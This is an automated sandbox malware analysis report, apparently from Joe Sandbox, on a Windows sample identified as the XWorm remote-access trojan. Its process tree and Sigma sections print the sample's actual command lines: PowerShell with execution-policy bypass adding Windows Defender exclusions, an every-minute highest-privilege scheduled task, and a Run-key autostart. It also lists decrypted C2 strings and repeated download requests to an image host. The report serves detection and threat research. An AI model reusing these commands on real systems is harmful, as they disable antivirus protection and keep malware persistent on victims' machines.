Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TJXpRilNkh.exe

Overview

General Information

Sample name:TJXpRilNkh.exe
renamed because original name is a hash value
Original sample name:2aebedd83903b137349f36ffb767c5ddfaa5aa0168b980203895546fe71f2103.exe
Analysis ID:1546353
MD5:f19b33379b749f757bb47c0866af8808
SHA1:a6c2232d04376cbe0ce75ac09bd7d86477b4a5da
SHA256:2aebedd83903b137349f36ffb767c5ddfaa5aa0168b980203895546fe71f2103
Tags:exeuser-Chainskilabs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • TJXpRilNkh.exe (PID: 5236 cmdline: "C:\Users\user\Desktop\TJXpRilNkh.exe" MD5: F19B33379B749F757BB47C0866AF8808)
    • powershell.exe (PID: 6572 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4464 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'TJXpRilNkh.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7112 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\TJXpRilNkh.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2968 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "TJXpRilNkh" /tr "C:\Users\user\AppData\Roaming\TJXpRilNkh.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 6364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 4480 cmdline: C:\Windows\system32\WerFault.exe -u -p 5236 -s 2964 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • TJXpRilNkh.exe (PID: 2604 cmdline: "C:\Users\user\AppData\Roaming\TJXpRilNkh.exe" MD5: F19B33379B749F757BB47C0866AF8808)
  • TJXpRilNkh.exe (PID: 5512 cmdline: "C:\Users\user\AppData\Roaming\TJXpRilNkh.exe" MD5: F19B33379B749F757BB47C0866AF8808)
  • TJXpRilNkh.exe (PID: 1680 cmdline: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe MD5: F19B33379B749F757BB47C0866AF8808)
  • TJXpRilNkh.exe (PID: 5976 cmdline: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe MD5: F19B33379B749F757BB47C0866AF8808)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
TJXpRilNkh.exeJoeSecurity_XWormYara detected XWormJoe Security
    TJXpRilNkh.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      TJXpRilNkh.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x10e08:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x10ea5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x10fba:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x100d6:$cnc4: POST / HTTP/1.1

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\TJXpRilNkh.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\TJXpRilNkh.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Roaming\TJXpRilNkh.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x10e08:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x10ea5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x10fba:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x100d6:$cnc4: POST / HTTP/1.1

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000000.2004670940.00000000005F2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000000.2004670940.00000000005F2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x10c08:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x10ca5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x10dba:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xfed6:$cnc4: POST / HTTP/1.1
            Process Memory Space: TJXpRilNkh.exe PID: 5236JoeSecurity_XWormYara detected XWormJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.0.TJXpRilNkh.exe.5f0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                0.0.TJXpRilNkh.exe.5f0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  0.0.TJXpRilNkh.exe.5f0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0x10e08:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x10ea5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x10fba:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0x100d6:$cnc4: POST / HTTP/1.1

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TJXpRilNkh.exe", ParentImage: C:\Users\user\Desktop\TJXpRilNkh.exe, ParentProcessId: 5236, ParentProcessName: TJXpRilNkh.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe', ProcessId: 6572, ProcessName: powershell.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TJXpRilNkh.exe", ParentImage: C:\Users\user\Desktop\TJXpRilNkh.exe, ParentProcessId: 5236, ParentProcessName: TJXpRilNkh.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe', ProcessId: 6572, ProcessName: powershell.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\TJXpRilNkh.exe, ProcessId: 5236, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TJXpRilNkh
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TJXpRilNkh.exe", ParentImage: C:\Users\user\Desktop\TJXpRilNkh.exe, ParentProcessId: 5236, ParentProcessName: TJXpRilNkh.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe', ProcessId: 6572, ProcessName: powershell.exe
                  Sigma detected: Startup Folder File Write
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\TJXpRilNkh.exe, ProcessId: 5236, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TJXpRilNkh.lnk
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "TJXpRilNkh" /tr "C:\Users\user\AppData\Roaming\TJXpRilNkh.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "TJXpRilNkh" /tr "C:\Users\user\AppData\Roaming\TJXpRilNkh.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TJXpRilNkh.exe", ParentImage: C:\Users\user\Desktop\TJXpRilNkh.exe, ParentProcessId: 5236, ParentProcessName: TJXpRilNkh.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "TJXpRilNkh" /tr "C:\Users\user\AppData\Roaming\TJXpRilNkh.exe", ProcessId: 2968, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TJXpRilNkh.exe", ParentImage: C:\Users\user\Desktop\TJXpRilNkh.exe, ParentProcessId: 5236, ParentProcessName: TJXpRilNkh.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe', ProcessId: 6572, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-31T19:57:14.669344+010020229301A Network Trojan was detected172.202.163.200443192.168.2.549704TCP
                  2024-10-31T19:57:54.265667+010020229301A Network Trojan was detected172.202.163.200443192.168.2.549907TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: TJXpRilNkh.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeAvira: detection malicious, Label: TR/Spy.Gen
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeReversingLabs: Detection: 78%
                  Multi AV Scanner detection for submitted file
                  Source: TJXpRilNkh.exeReversingLabs: Detection: 78%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: TJXpRilNkh.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: TJXpRilNkh.exeString decryptor: fe80::edf5:92cd:756d:3fbd%9
                  Source: TJXpRilNkh.exeString decryptor: 5552
                  Source: TJXpRilNkh.exeString decryptor: <123456789>
                  Source: TJXpRilNkh.exeString decryptor: <Xwormmm>
                  Source: TJXpRilNkh.exeString decryptor: USB.exe
                  Source: TJXpRilNkh.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.5:49844 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.5:49936 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.5:49953 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.5:49954 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.5:49955 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.5:49956 version: TLS 1.2
                  Source: TJXpRilNkh.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: .pdb| source: TJXpRilNkh.exe, 00000000.00000002.3564900844.000000001C0E9000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Xml.ni.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbw source: TJXpRilNkh.exe, 00000000.00000002.3565307904.000000001C3F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Windows.Forms.ni.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Drawing.ni.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Configuration.ni.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdby source: TJXpRilNkh.exe, 00000000.00000002.3559504112.000000001B4C6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: TJXpRilNkh.exe, 00000000.00000002.3564900844.000000001C0E9000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Configuration.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: symbols\dll\mscorlib.pdbpdb` source: TJXpRilNkh.exe, 00000000.00000002.3564900844.000000001C0E9000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Drawing.ni.pdbRSDS source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.pdbMZ source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Xml.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: 0C:\Windows\mscorlib.pdb source: TJXpRilNkh.exe, 00000000.00000002.3564900844.000000001C0E9000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Core.ni.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: TJXpRilNkh.exe, 00000000.00000002.3559504112.000000001B4C6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: TJXpRilNkh.exe, 00000000.00000002.3565307904.000000001C418000.00000004.00000020.00020000.00000000.sdmp, TJXpRilNkh.exe, 00000000.00000002.3559504112.000000001B453000.00000004.00000020.00020000.00000000.sdmp, WER443E.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: TJXpRilNkh.exe, 00000000.00000002.3565307904.000000001C3F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\Desktop\TJXpRilNkh.PDB+ source: TJXpRilNkh.exe, 00000000.00000002.3565307904.000000001C3F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Drawing.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: mscorlib.ni.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Core.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: indoC:\Windows\mscorlib.pdb source: TJXpRilNkh.exe, 00000000.00000002.3564900844.000000001C0E9000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WER443E.tmp.dmp.19.dr

                  Networking

                  barindex
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: TJXpRilNkh.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.TJXpRilNkh.exe.5f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe, type: DROPPED
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
